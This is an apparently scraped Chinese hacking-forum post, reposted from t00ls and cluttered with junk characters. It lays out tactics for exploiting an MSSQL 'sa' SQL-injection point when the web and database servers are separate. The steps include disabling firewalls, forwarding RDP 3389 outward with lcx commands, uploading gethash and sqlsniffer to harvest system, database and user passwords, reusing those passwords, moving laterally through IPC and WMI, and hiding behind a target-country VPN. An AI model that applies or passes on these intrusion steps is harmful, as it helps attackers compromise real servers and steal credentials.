当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。3 l! n [/ _* T9 W, V8 L
9 c6 @. K7 g4 ?7 ~. X* G8 B
m3 G3 G" a8 ?, w4 D' Y8 n$ O7 Z7 O" N5 v2 O' H
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)0 {; c. m/ q, b5 ]0 o8 `/ L
, V' A9 V. {2 o1 @5 Z$ P6 l" @1 G( U. g& R+ N3 I" l
一、DB机有公网IP.
! F# E6 k8 M+ W- b |# V; g; Q1 G0 o9 f! O V
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
! o% r0 L* c7 o8 l# l9 |5 n' {2 n
5 U# ~' h: c4 k8 x+ F1 s4 w. N
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.1 d! Y# s) X x& N0 y
# z0 C- d* ]2 i5 D# ?0 P$ K3 i$ }
5 X: B* s# P w1 W9 W( A3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
- r4 c$ w! j( G7 x
7 \+ w* D3 r) l0 D/ J! g, P4 h
8 y3 A. U! U6 `; r1 g: E$ C6 _4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
8 {3 E/ k9 S, T* I1 N
$ J( ], Z/ l+ L }' f& Q" T' F' Z7 i9 u9 A9 Z
8 h7 x: z; h1 [, ]
二、DB机只有内网IP& N$ [: k( [, @& ~$ y/ z
( D C; C7 Q/ V w" q1 y( v) o
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
, ^& ?: E( g, ? l' i* `/ b- h: [" n* y9 P! p' A
1 F# l$ _; O- A2:停掉防火墙和IP策略再从内往外扫描.
& X1 O; o/ V3 T: O9 G# D2 O4 T/ ^. e" ]8 R6 R# V
" A/ o3 Y2 L( t2 h ]3 _: ^5 W3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.6 h# l4 {2 B3 I7 w/ J
! G* S. ^4 h5 j6 ~2 B
- L$ p7 W7 w) F( j8 Q) d- y4:学会密码规律分析往往会有惊喜. `( }4 S+ [2 R# z. ~4 N0 _
! ?6 q0 T/ V6 L% H
% ~$ o( I; m$ O' i1 r- D$ |. ?5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
) o3 ]; t( T7 q( x- n0 L. P- e8 e: e) a
: u& Z3 R. d p$ r有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |